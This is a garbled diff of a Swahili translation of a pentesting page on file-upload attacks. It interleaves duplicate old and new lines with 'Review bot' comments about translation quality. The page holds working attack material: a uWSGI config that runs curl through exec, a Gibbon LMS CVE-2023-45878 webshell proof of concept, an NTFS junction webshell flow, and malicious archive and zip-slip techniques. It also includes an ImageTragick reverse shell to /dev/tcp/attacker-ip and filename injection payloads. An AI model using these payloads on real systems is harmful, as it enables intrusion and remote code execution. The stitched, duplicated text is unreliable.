Ikiwa unajaribu kupakia faili kwenye **ASP server**, [take a look at the **.config** trick to execute code](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files).
Ikiwa unajaribu kupakia faili kwenye **PHP server**, [tazama njia ya **.htaccess** ya kuendesha code](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/php-tricks-esp/index.html#code-execution).\
Ikiwa unajaribu kupakia faili kwenye **ASP server**, [tazama njia ya **.config** ya kuendesha code](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files).
Faili za `.phar` ni kama `.jar` kwa java, lakini kwa php, na zinaweza **kutumika kama php file** (kuzitekeleza kwa php, au kuzijumlisha ndani ya script...)
Faili za `.phar` ni kama `.jar` kwa java, lakini kwa php, na zinaweza kutumika kama **faili ya php** (kuziendesha kwa php, au kuzijumuisha ndani ya script...)
Extension ya `.inc` mara nyingi hutumika kwa php files zinazotumika tu **kuimport files**, hivyo, wakati fulani, mtu anaweza kuruhusu **extension hii itekelezwe**.
Extension ya `.inc` wakati mwingine hutumika kwa faili za php zinazotumiwa tu kuingiza/import files, kwa hivyo, pengine, mtu anaweza kuwa amemruhusu **extension hii itekelezwe**.
## **Jetty RCE**
Ikiwa unaweza kupakia faili ya XML kwenye Jetty server unaweza kupata [RCE because **new *.xml and *.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** Kwa hivyo, kama inavyoonyeshwa kwenye picha ifuatayo, pakia faili ya XML kwenye `$JETTY_BASE/webapps/` na tarajia shell!
Ikiwa unaweza kupakia faili ya XML kwenye server ya Jetty unaweza kupata [RCE because **new *.xml and *.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** Kwa hiyo, kama ilivyoonyeshwa katika picha ifuatayo, pakia faili ya XML kwenye `$JETTY_BASE/webapps/` na tarajia shell!
![https://twitter.com/ptswarm/status/1555184661751648256/photo/1](<../../images/image (1047).png>)
## **uWSGI RCE**
Kwa uchambuzi wa kina wa udhaifu huyu angalia utafiti wa asili: [uWSGI RCE Exploitation](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html).
Kwa uchunguzi wa kina wa udhaifu huu angalia utafiti wa asili: [uWSGI RCE Exploitation](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html).
Udhaifu za Remote Command Execution (RCE) zinaweza kutumika kwenye uWSGI servers ikiwa mtu ana uwezo wa kubadilisha `.ini` configuration file. uWSGI configuration files hutegemea syntax maalum kujumuisha "magic" variables, placeholders, na operators. Kwa mfano, operator '@', inayotumika kama `@(filename)`, imeundwa kujumuisha yaliyomo ya file. Miongoni mwa schemes mbalimbali zinazotambuliwa na uWSGI, scheme ya "exec" ni hasa yenye nguvu, ikiruhusu kusoma data kutoka standard output ya mchakato. Kipengele hiki kinaweza kutumiwa kwa madhumuni mabaya kama Remote Command Execution au Arbitrary File Write/Read wakati `.ini` configuration file inapototolewa.
Udhaifu za Remote Command Execution (RCE) zinaweza kutumiwa kwenye servers za uWSGI ikiwa mtu ana uwezo wa kubadilisha faili ya usanidi `.ini`. Faili za usanidi za uWSGI zinatumia sintaksia maalum kuingiza "magic" variables, placeholders, na operators. Kwa mfano, operator '@', inayotumika kama `@(filename)`, imekusudiwa kujumuisha yaliyomo ya faili. Kati ya schemes mbalimbali zinazoungwa mkono na uWSGI, scheme ya "exec" ni hatari hasa, ikiruhusu kusoma data kutoka kwa standard output ya mchakato. Kipengele hiki kinaweza kutumiwa kwa madhumuni mabaya kama Remote Command Execution au Arbitrary File Write/Read wakati faili ya usanidi `.ini` inapoproseswa.
Tafakari mfano ufuatao wa hatari wa `uwsgi.ini` file, unaoonyesha schemes mbalimbali:
Angalia mfano ufuatao wa faili hatari ya `uwsgi.ini`, unaoonyesha schemes mbalimbali:
```ini
[uwsgi]
; read from a symbol
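Review bot: L253 inverts the meaning of the reserved-names bullet: "majina yaliyohifadhiwa (yaliyoruhusiwa kutumika)" says reserved names that are allowed to be used, whereas L247 has "**reserved** (**forbidden**) **names**"; the parenthetical should be "yaliyokatazwa". The Mitigations list also ends up in three states at once: L213 mixes the English "to" into a Swahili sentence where L210 had "hadi", L214 is entirely English, and L215 is Swahili; likewise L224 reverts the Swahili L223 to English in the middle of a bullet. L239's "imepakizwa" is not standard; L250 in the same hunk uses "zilizopakiwa", which is.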
@ -156,20 +156,20 @@ extra = @(exec://curl http://collaborator-unique-host.oastify.com)
; call a function returning a char *
characters = @(call://uwsgi_func)
```
Utekelezaji wa payload hufanyika wakati faili ya usanidi inachanganuliwa. Ili usanidi uanze kutumika na kuchanganuliwa, mchakato wa uWSGI lazima uanzishwe upya (kwa mfano baada ya crash au kutokana na Denial of Service attack) au faili lazima iwe imewekwa ku-auto-reload. Kipengele cha auto-reload, ikiwa kimewezeshwa, kinapakia tena faili kwa vipindi vilivyobainishwa linapogundua mabadiliko.
Utekelezaji wa payload hutokea wakati wa kufasiri faili ya usanidi. Ili usanidi uanze kutumika na kufasiriwa, mchakato wa uWSGI lazima uanzishwe upya (pengine baada ya crash au kutokana na Denial of Service attack) au faili lazima iwe imewekwa ku-auto-reload. Kipengele cha auto-reload, ikiwa kimewezeshwa, kinareload faili kwa interval maalum linapogundua mabadiliko.
Ni muhimu kuelewa jinsi uchanganaji wa faili za usanidi za uWSGI unavyokuwa mwepesi. Hasa, payload iliyojadiliwa inaweza kuingizwa ndani ya faili ya binary (kama picha au PDF), jambo linalopanua zaidi wigo wa potential exploitation.
Ni muhimu kuelewa jinsi uWSGI unavyokuwa laini katika kufasiri faili za usanidi. Hasa, payload iliyojadiliwa inaweza kuingizwa ndani ya faili ya binary (kama picha au PDF), ikipanua wigo wa exploitation.
### Gibbon LMS arbitrary file write to pre-auth RCE (CVE-2023-45878)
Endpoint isiyothibitishwa katika Gibbon LMS inaruhusu uandishi wa faili kwa makusudi ndani ya web root, ikisababisha pre-auth RCE kwa kuacha faili ya PHP. Toleo zilizoathirika: hadi na pamoja na 25.0.01.
Unauthenticated endpoint in Gibbon LMS inaruhusu arbitrary file write ndani ya web root, ikisababisha pre-auth RCE kwa ku-drop PHP file. Vulnerable versions: up to and including 25.0.01.
- Endpoint: `/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php`
- Njia: POST
- Vigezo vinavyohitajika:
- `img`: data-URI-like string: `[mime];[name],[base64]` (server inapuuza type/name, inafanya base64-decode sehemu ya mwisho)
- `path`: jina la faili linalolengwa kulingana na Gibbon install dir (e.g., `poc.php` or `0xdf.php`)
- `gibbonPersonID`: thamani yoyote isiyo tupu inakubaliwa (e.g., `0000000001`)
- Method: POST
- Required params:
- `img`: data-URI-like string: `[mime];[name],[base64]` (seva inapuuza type/name, inafanya base64-decode sehemu ya mwisho)
- `path`: destination filename relative to Gibbon install dir (e.g., `poc.php` or `0xdf.php`)
- `gibbonPersonID`: any non-empty value is accepted (e.g., `0000000001`)
Minimal PoC ya kuandika na kusoma tena faili:
```bash
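Review bot: L288 and L295-L299 replace fully Swahili lines (L287, L290-L294) with mostly English text: "Unauthenticated endpoint in Gibbon LMS inaruhusu arbitrary file write ndani ya web root", "Vulnerable versions: up to and including 25.0.01.", "Method: POST", "Required params:", "destination filename relative to Gibbon install dir". If the section is meant to be Swahili, keep L287 and L290-L294 ("Njia: POST", "Vigezo vinavyohitajika:"). The CVE id, the endpoint path and the affected version are identical in both versions, so the advisory content itself is unchanged.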
@ -184,7 +184,7 @@ curl http://target/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php \
# Verify write
curl http://target/Gibbon-LMS/poc.php
```
Pakia webshell mdogo na endesha amri:
Weka webshell ndogo na endesha commands:
```bash
# '<?php system($_GET["cmd"]); ?>' base64
# PD9waHAgIHN5c3RlbSgkX0dFVFsiY21kIl0pOyA/Pg==
@ -195,15 +195,15 @@ curl http://target/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php \
curl 'http://target/Gibbon-LMS/shell.php?cmd=whoami'
```
Vidokezo:
- Mshughuliki hufanya `base64_decode($_POST["img"])` baada ya kugawanya kwa `;` na `,`, kisha inaandika bytes kwa `$absolutePath . '/' . $_POST['path']` bila kuthibitisha extension/type.
- Msimbo utakaotokana unaendesha kama mtumiaji wa web service (kwa mfano, XAMPP Apache on Windows).
- Handler inafanya `base64_decode($_POST["img"])` baada ya kugawanya kwa `;` na `,`, kisha inaandika bytes kwenye `$absolutePath . '/' . $_POST['path']` bila kuthibitisha extension/type.
- Msimbo uliotokana unakimbia kama mtumiaji wa web service (mfano, XAMPP Apache on Windows).
References for this bug include the usd HeroLab advisory and the NVD entry. See the References section below.
## **wget File Upload/SSRF Trick**
## **wget File Upload/SSRF Mbinu**
Katika baadhi ya matukio unaweza kugundua kuwa seva inatumia **`wget`** kupakua **faili** na unaweza **kuonyesha** **URL**. Katika hali hizi, msimbo unaweza kuwa unakagua kwamba extension ya faili zilizopakuliwa iko kwenye whitelist ili kuhakikisha kwamba ni faili zilizoruhusiwa tu zitakazopakuliwa. Hata hivyo, **ukaguzi huu unaweza kuvukiwa.**\
Urefu wa **maximum** wa **filename** katika **linux** ni **255**, hata hivyo, **wget** hupunguza majina ya faili hadi **236** characters. Unaweza **download a file called "A"*232+".php"+".gif"**, jina hili la faili lita**bypass** **check** (kama katika mfano huu **".gif"** ni **valid** extension) lakini `wget` itanipa jina jipya la faili kuwa **"A"*232+".php"**.
Katika baadhi ya matukio unaweza kugundua kuwa server inatumia **`wget`** kupakua **files** na unaweza **kuonyesha** **URL**. Katika hizi kesi, code inaweza kukagua kwamba extension ya faili zilizopakuliwa iko ndani ya whitelist ili kuhakikisha kwamba ni faili zilizoruhusiwa pekee zitatakapotolewa. Hata hivyo, **ukaguzi huu unaweza kupitishwa.**\
Urefu wa **maximum** wa jina la **filename** kwenye **linux** ni **255**, hata hivyo, **wget** hupunguza majina ya faili hadi **236** herufi. Unaweza **download a file called "A"*232+".php"+".gif"**, jina hili la faili lita**bypass** ukaguzi (kama katika mfano huu **".gif"** ni extension **valid**) lakini `wget` itafanya **rename** ya faili kuwa **"A"*232+".php"**.
```bash
#Create file and HTTP server
echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
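Review bot: "zitatakapotolewa" in the new wget paragraph is a typo; the removed line had the correct form "zitakazopakuliwa". The heading "## **wget File Upload/SSRF Mbinu**" appends one Swahili word to an otherwise English title, while the rest of the page keeps English section titles ("## Tools", "## From File upload to other vulnerabilities"); either keep "Trick" or translate the whole heading ("## **Mbinu ya wget File Upload/SSRF**"). In the two new "Vidokezo" bullets the translation is fine, but both describe the defect ("bila kuthibitisha extension/type") without naming the remedy; one clause saying that the server must validate the extension and type before writing would make the notes useful to people patching Gibbon rather than testing it.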
@ -228,33 +228,58 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[=============================================
```
Note that **another option** you may be thinking of to bypass this check is to make the **HTTP server redirect to a different file**, so the initial URL will bypass the check by then wget will download the redirected file with the new name. This **won't work** **unless** wget is being used with the **parameter** `--trust-server-names` because **wget will download the redirected page with the name of the file indicated in the original URL**.
## Zana
### Kutoroka kwa upload directory kwa kutumia NTFS junctions (Windows)
- [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) ni zana yenye nguvu iliyoundwa kusaidia Pentesters na Bug Hunters katika kujaribu mifumo ya kupakia faili. Inatumia mbinu mbalimbali za bug bounty ili kurahisisha mchakato wa kutambua na kutumia udhaifu, ikihakikisha tathmini kamili za web applications.
(Kwa shambulio hili utahitaji local access kwa mashine ya Windows) Wakati uploads zinahifadhiwa chini ya subfolders za kila mtumiaji kwenye Windows (mfano, C:\Windows\Tasks\Uploads\<id>\) na unadhibiti uundaji/ufutaji wa subfolder hiyo, unaweza kuibadilisha na directory junction inayoleta kwenye eneo nyeti (mfano, webroot). Uploads zinazofuata zitaandikwa kwenye target path, na hivyo kuwezesha utekelezaji wa code ikiwa target inatafsiri serverside code.
Example flow to redirect uploads into XAMPP webroot:
```cmd
:: 1) Upload once to learn/confirm your per-user folder name (e.g., md5 of form fields)
:: Observe it on disk: C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882
:: 2) Remove the created folder and create a junction to webroot
rmdir C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882
cmd /c mklink /J C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882 C:\xampp\htdocs
:: 3) Re-upload your payload; it lands under C:\xampp\htdocs
:: Minimal PHP webshell for testing
:: <?php echo shell_exec($_REQUEST['cmd']); ?>
:: 4) Trigger
curl "http://TARGET/shell.php?cmd=whoami"
```
Notes
- mklink /J creates an NTFS directory junction (reparse point). Akaunti ya web server lazima ifuate junction na iwe na idhini ya kuandika kwenye mahali lengwa.
- This redirects arbitrary file writes; if the destination executes scripts (PHP/ASP), this becomes RCE.
- Defenses: dont allow writable upload roots to be attackercontrollable under C:\Windows\Tasks or similar; block junction creation; validate extensions serverside; store uploads on a separate volume or with denyexecute ACLs.
## Tools
- [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.
### Corrupting upload indices with snprintf quirks (historical)
Baadhi ya upload handlers za zamani ambazo zinatumia `snprintf()` au sawa ili kujenga arrays za faili nyingi kutoka kwa upload ya faili moja zinaweza kudanganywa kujifanya zinafanya forge ya muundo wa `_FILES`. Kutokana na kutokukamilika na kukatwa kwa tabia ya `snprintf()`, upload iliyoundwa kwa uangalifu inaweza kuonekana kama faili nyingi zilizo na index kwenye upande wa server, ikachanganya mantiki inayodhani muundo thabiti (mfano, kuitaza kama upload ya faili nyingi na kuchukua matawi hatarishi). Ingawa ni nadra leo, muundo huu wa “index corruption” mara kwa mara huibuka tena katika CTFs na codebases za zamani.
Some legacy upload handlers that use `snprintf()` or similar to build multi-file arrays from a single-file upload can be tricked into forging the `_FILES` structure. Due to inconsistencies and truncation in `snprintf()` behavior, a carefully crafted single upload can appear as multiple indexed files on the server side, confusing logic that assumes a strict shape (e.g., treating it as a multi-file upload and taking unsafe branches). While niche today, this “index corruption” pattern occasionally resurfaces in CTFs and older codebases.
## From File upload to other vulnerabilities
- Weka **filename** kuwa `../../../tmp/lol.png` na jaribu kupata **path traversal**
- Weka **filename** kuwa `sleep(10)-- -.jpg` na huenda ukaweza kupata **SQL injection**
- Weka **filename** kuwa `<svg onload=alert(document.domain)>` ili kupata XSS
- Weka **filename** kuwa `; sleep 10;` ili kujaribu command injection (more [command injections tricks here](../command-injection.md))
- Set **filename** to `../../../tmp/lol.png` and try to achieve a **path traversal**
- Set **filename** to `sleep(10)-- -.jpg` and you may be able to achieve a **SQL injection**
- Set **filename** to `<svg onload=alert(document.domain)>` to achieve a XSS
- Set **filename** to `; sleep 10;` to test some command injection (more [command injections tricks here](../command-injection.md))
- [**XSS** in image (svg) file upload](../xss-cross-site-scripting/index.html#xss-uploading-files-svg)
- **JS** file **upload** + **XSS** = [**Service Workers** exploitation](../xss-cross-site-scripting/index.html#xss-abusing-service-workers)
- [**XXE in svg upload**](../xxe-xee-xml-external-entity.md#svg-file-upload)
- [**Open Redirect** via uploading svg file](../open-redirect.md#open-redirect-uploading-svg-files)
- Jaribu **different svg payloads** kutoka [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)
- Try **different svg payloads** from [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)
- [Famous **ImageTrick** vulnerability](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/)
- Ikiwa unaweza **kuonyesha web server ichukue picha kutoka kwa URL** unaweza kujaribu kubadilisha kwa kutumia [SSRF](../ssrf-server-side-request-forgery/index.html). Ikiwa picha hii itahifadhiwa kwenye tovuti **public**, unaweza pia kuonyesha URL kutoka [https://iplogger.org/invisible/](https://iplogger.org/invisible/) na **kuiba taarifa za kila mgeni**.
- If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery/index.html). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/] and **steal information of every visitor**.
- [**XXE and CORS** bypass with PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md)
- PDF zilizotengenezwa kwa njia maalumu kwa XSS: Ukurasa wa [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). Ikiwa unaweza kupakia PDFs unaweza kuandaa PDF itakayotekeleza JS kwa mujibu wa maelekezo yaliyotolewa.
- Pakia yaliyomo ya \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) ili kuangalia kama server ina **antivirus**
- Angalia kama kuna **kizuizi cha ukubwa** wakati wa kupakia faili
- Specially crafted PDFs to XSS: The [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). If you can upload PDFs you could prepare some PDF that will execute arbitrary JS following the given indications.
- Upload the \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) content to check if the server has any **antivirus**
- Check if there is any **size limit** uploading files
Hapa kuna orodha ya top 10 ya mambo unayoweza kufanya kwa kupakia (kutoka [here](https://twitter.com/SalahHasoneh1/status/1281274120395685889)):
Heres a top 10 list of things that you can achieve by uploading (from [here](https://twitter.com/SalahHasoneh1/status/1281274120395685889)):
1. **ASP / ASPX / PHP5 / PHP / PHP3**: Webshell / RCE
2. **SVG**: Stored XSS / SSRF / XXE
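Review bot: most of the added lines in this region replace Swahili that was already translated with the English source text, which undoes the translation: the "Set **filename** to ..." bullets replace "Weka **filename** kuwa ...", and the same happens for "Try **different svg payloads** ...", "If you can **indicate the web server ...", "Specially crafted PDFs to XSS ...", "Upload the eicar ...", "Check if there is any **size limit** ...", "Here's a top 10 list ..." and the Upload Bypass tool bullet under "## Tools". Keep the removed Swahili lines. Two further points on the new NTFS junction subsection: it is inserted as a "###" directly before "## Tools", so it nests under the preceding wget section, which it has nothing to do with; promote it to "##" or move it next to the other Windows-specific material. Its "Notes" list lost characters, so "dont", "attackercontrollable", "denyexecute" and "serverside" should read "don't", "attacker-controllable", "deny-execute" and "server-side", and "Notes" and "Example flow to redirect uploads into XAMPP webroot:" are untranslated. The precondition already stated ("Akaunti ya web server lazima ifuate junction na iwe na idhini ya kuandika kwenye mahali lengwa") is the one defenders should read twice: if the upload service account has no write access to the webroot the junction is harmless, and a periodic `dir /AL` over the upload root (lists reparse points) is a cheap check for junctions appearing where only plain folders are expected.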
@ -279,34 +304,34 @@ https://github.com/portswigger/upload-scanner
- **PNG**: `"\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\x s0\x03["`
- **JPG**: `"\xff\xd8\xff"`
Rejea [https://en.wikipedia.org/wiki/List_of_file_signatures](https://en.wikipedia.org/wiki/List_of_file_signatures) kwa aina nyingine za faili.
Refer to [https://en.wikipedia.org/wiki/List_of_file_signatures](https://en.wikipedia.org/wiki/List_of_file_signatures) for other filetypes.
## Zip/Tar File Automatically decompressed Upload
Ikiwa unaweza kupakia ZIP ambayo itafunguliwa ndani ya server, unaweza kufanya vitu 2:
If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things:
### Symlink
Pakia archive lenye soft links kuelekea kwa faili nyingine, kisha kwa kufikia faili zilizofunguliwa utaweza kufikia faili zilizohusishwa:
Upload a link containing soft links to other files, then, accessing the decompressed files you will access the linked files:
```
ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
tar -cvf test.tar symindex.txt
```
### Kufungua (decompress) katika folda tofauti
### Kutoa yaliyokandamizwa katika folda tofauti
Uundaji wa mafaili yasiyotarajiwa ndani ya directories wakati wa decompression ni tatizo kubwa. Ingawa awali mtu angefikiri kwamba mpangilio huu unaweza kuzuia OS-level command execution kupitia malicious file uploads, msaada wa hierarchical compression na uwezo wa directory traversal wa fomati ya ZIP unaweza kutumika vibaya. Hii inawawezesha attackers kupita vikwazo na kutoroka kutoka kwa secure upload directories kwa kudanganya decompression functionality ya application iliyolengwa.
Uundaji usiotarajiwa wa faili katika saraka wakati wa kutolewa kwa yaliyokandamizwa ni tatizo kubwa. Licha ya dhana za awali kwamba mpangilio huu ungeweza kuzuia utekelezaji wa amri za OS-level kupitia file uploads zenye madhara, msaada wa compression wenye hierarki na uwezo wa directory traversal wa ZIP archive format unaweza kutumika vibaya. Hii inawawezesha wadukuzi kupita vikwazo na kutoka kwenye saraka salama za upload kwa kudanganya kazi ya decompression ya application lengwa.
Automated exploit ya kutengeneza mafaili kama hayo inapatikana kwenye [**evilarc on GitHub**](https://github.com/ptoomey3/evilarc). Zana inaweza kutumika kama ifuatavyo:
Exploit ya kiotomatiki kutengeneza faili kama hizo inapatikana kwenye [**evilarc kwenye GitHub**](https://github.com/ptoomey3/evilarc). Zana inaweza kutumika kama ifuatavyo:
```python
# Listing available options
python2 evilarc.py -h
# Creating a malicious archive
python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
```
Zaidi ya hayo, **symlink trick with evilarc** ni chaguo. Ikiwa lengo ni kulenga faili kama `/flag.txt`, symlink kwa faili hiyo inapaswa kuundwa kwenye mfumo wako. Hii inahakikisha kwamba evilarc haitapata makosa wakati wa kuendesha.
Aidha, **symlink trick with evilarc** ni chaguo. Ikiwa lengo ni kulenga faili kama `/flag.txt`, symlink kwa faili hiyo inapaswa kuundwa kwenye mfumo wako. Hii inahakikisha kwamba evilarc haitakutana na makosa wakati wa utekelezaji wake.
Hapo chini kuna mfano wa Python code unaotumika kuunda faili ya zip yenye madhara:
Hapo chini kuna mfano wa Python code inayotumiwa kuunda zip file yenye madhumuni mabaya:
```python
#!/usr/bin/python
import zipfile
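Review bot: the PNG signature line `"\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\x s0\x03["` is not a valid byte string in any language because of the broken escape `\x s0` (a space inside a hex escape), and everything after the first 8 bytes is the IHDR chunk length, type and the sample image's own dimensions, not part of the file signature; trim it to `"\x89PNG\r\n\x1a\n"` or label the remainder as an example header. The added lines "Refer to ... for other filetypes.", "If you can upload a ZIP ..." and "Upload a link containing soft links ..." reinstate English over the Swahili that was there; the last one is also wrong in the English source ("a link" should be "an archive"), which the removed Swahili line ("Pakia archive lenye soft links ...") already had right. The heading change to "### Kutoa yaliyokandamizwa katika folda tofauti" drops the bracketed English term that the removed heading carried; since "decompression" is used throughout the following paragraph, keep "(decompress)" in the heading to anchor the reader. The traversal paragraph could close with the corresponding fix in one sentence: normalise each archive entry path and refuse any that resolves outside the extraction directory, and skip symlink entries entirely, which covers both the symlink and the "../" variants described here.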
@ -325,11 +350,11 @@ zip.close()
create_zip()
```
**Kutumia vibaya compression kwa file spraying**
**Abusing compression for file spraying**
Kwa maelezo zaidi **angalia chapisho la asili katika**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
1. **Creating a PHP Shell**: Msimbo wa PHP umeandikwa kutekeleza amri zinazopitishwa kupitia variable `$_REQUEST`.
1. **Creating a PHP Shell**: Msimbo wa PHP umeandikwa kutekeleza amri ambazo zinapitishwa kupitia kigezo `$_REQUEST`.
```php
<?php
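Review bot: "**Abusing compression for file spraying**" replaces the Swahili bold heading "**Kutumia vibaya compression kwa file spraying**" with the untranslated English; keep the Swahili. In step 1, "kigezo `$_REQUEST`" is acceptable, but `$_REQUEST` is a PHP superglobal rather than a parameter, so "superglobal `$_REQUEST`" would be more precise than either "variable" or "kigezo".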
@ -339,14 +364,14 @@ system($cmd);
}?>
```
2. **File Spraying and Compressed File Creation**: Faili nyingi zinaumbwa na archive ya zip inajengwa ikijumuisha faili hizi.
2. **File Spraying and Compressed File Creation**: Mafaili mengi yanaundwa na archive ya zip inatengenezwa ikiwa na mafaili haya.
```bash
root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# zip cmd.zip xx*.php
```
3. **Modification with a Hex Editor or vi**: Majina ya faili ndani ya zip yanabadilishwa kwa kutumia vi au hex editor, kubadilisha "xxA" kuwa "../" ili kupita kwenye directories.
3. **Modification with a Hex Editor or vi**: Majina ya mafaili ndani ya zip yamebadilishwa kwa kutumia vi au hex editor, kubadilisha "xxA" kuwa "../" ili kupita saraka.
```bash
:set modifiable
@ -356,38 +381,38 @@ root@s2crew:/tmp# zip cmd.zip xx*.php
## ImageTragic
Pakia yaliyomo haya kwa extension ya picha ili kutumia udhaifu **(ImageMagick , 7.0.1-1)** (tazama [exploit](https://www.exploit-db.com/exploits/39767))
Pakia yaliyomo haya ukiwa na extension ya picha ili kutumia udhaifu **(ImageMagick , 7.0.1-1)** (toka kwenye [exploit](https://www.exploit-db.com/exploits/39767))
```
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context
```
## Embedding PHP Shell on PNG
## Kuingiza PHP Shell ndani ya PNG
Kuingiza PHP shell ndani ya chunk ya IDAT ya faili ya PNG kunaweza kuzuia kwa ufanisi baadhi ya operesheni za usindikaji wa picha. Funsioni `imagecopyresized` na `imagecopyresampled` kutoka PHP-GD zina umuhimu maalum katika muktadha huu, kwani kwa kawaida zinatumiwa kwa resizing na resampling ya picha, mtawalia. Uwezo wa PHP shell iliyojazwa kubaki isiyoathiriwa na operesheni hizi ni faida muhimu kwa matumizi fulani.
Kuingiza PHP shell katika IDAT chunk ya faili ya PNG kunaweza kupitisha kwa ufanisi baadhi ya operesheni za usindikaji wa picha. Funguo za `imagecopyresized` na `imagecopyresampled` kutoka PHP-GD zina umuhimu maalum katika muktadha huu, kwa kuwa hutumiwa mara kwa mara kwa kubadilisha ukubwa na resampling ya picha, mtawaliwa. Uwezo wa PHP shell iliyowekwa kukaa bila kuathiriwa na operesheni hizi ni faida muhimu kwa matumizi fulani.
Uchambuzi wa kina wa mbinu hii, ikiwa ni pamoja na metodolojia na matumizi yake yanayowezekana, unapatikana katika makala ifuatayo: ["Encoding Web Shells in PNG IDAT chunks"](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/). Rasilimali hii inatoa uelewa mpana wa mchakato na athari zake.
Uchambuzi wa kina wa mbinu hii, ikijumuisha metodologia na matumizi yanayoweza, umeelezewa katika makala ifuatayo: ["Encoding Web Shells in PNG IDAT chunks"](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/). Rasilimali hii inatoa uelewa mpana wa mchakato na athari zake.
More information in: [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
## Polyglot Files
## Faili za Polyglot
Polyglot files zinatumika kama zana ya kipekee katika usalama wa mtandao, zikifanya kazi kama chameleon ambazo zinaweza kuwepo kwa uhalali katika miundo mbalimbali ya faili kwa wakati mmoja. Mfano wa kuvutia ni [GIFAR](https://en.wikipedia.org/wiki/Gifar), nyongeza inayofanya kazi wakati huo huo kama GIF na archive ya RAR. Faili hizi hazizuiliki kwa jozi hii tu; mchanganyiko kama GIF na JS au PPT na JS pia inawezekana.
Faili za polyglot ni chombo maalum katika cybersecurity, zikifanya kazi kama kamelon ambazo zinaweza kuwepo kwa uhalali katika miundo mingi ya faili kwa wakati mmoja. Mfano wa kuvutia ni [GIFAR](https://en.wikipedia.org/wiki/Gifar), mseto unaofanya kazi kama GIF na pia kama RAR archive. Faili kama hizi haziko tu kwa mseto huo; mchanganyiko kama GIF na JS au PPT na JS pia yanawezekana.
Faida kuu ya polyglot files iko katika uwezo wao wa kuepuka viwango vya usalama vinavyoscreen faili kulingana na aina. Mazoezi ya kawaida katika programu mbalimbali ni kuruhusu aina maalum za faili kwa upload—kama JPEG, GIF, au DOC—ili kupunguza hatari inayotokana na muundo hatari (mfano, JS, PHP, au Phar files). Hata hivyo, polyglot, kwa kufuata vigezo vya muundo vya aina nyingi za faili, inaweza kupita kwa utupu vikwazo hivi kwa siri.
Manufaa ya msingi ya faili za polyglot yako katika uwezo wake wa kuepuka hatua za usalama ambazo hupima faili kwa msingi wa aina. Mazingira mengi huruhusu aina fulani tu za faili kupakiwa—kama JPEG, GIF, au DOC—ili kupunguza hatari inayotokana na miundo hatari (mfano, JS, PHP, au Phar). Hata hivyo, polyglot, kwa kufuata vigezo vya muundo vya aina mbalimbali za faili, inaweza kupitisha vikwazo hivi kwa utulivu.
Licha ya ufanisi wao, polyglots hukutana na vizingiti. Kwa mfano, wakati polyglot inaweza kuwa PHAR file (PHp ARchive) na JPEG kwa pamoja, mafanikio ya upload yake yanaweza kutegemea sera za extension za jukwaa. Ikiwa mfumo ni mkali kuhusu extensions zinazokubaliwa, uraia wa muundo wa polyglot peke yake unaweza kutokutosha kuhakikisha upload yake.
Licha ya kubadilika kwao, polyglots zina mipaka. Kwa mfano, ingawa polyglot inaweza kwa wakati mmoja kuwa faili ya PHAR (PHp ARchive) na JPEG, mafanikio ya upakiaji wake yanaweza kutegemea sera za extensions za jukwaa. Ikiwa mfumo ni mkali kuhusu extensions zinazokubalika, utambulisho wa muundo wa polyglot peke yake unaweza kutokuwa na uwezo wa kuhakikisha upakiaji wake.
More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
### Upload valid JSONs like if it was PDF
### Kupakia JSON halali kana kwamba ni PDF
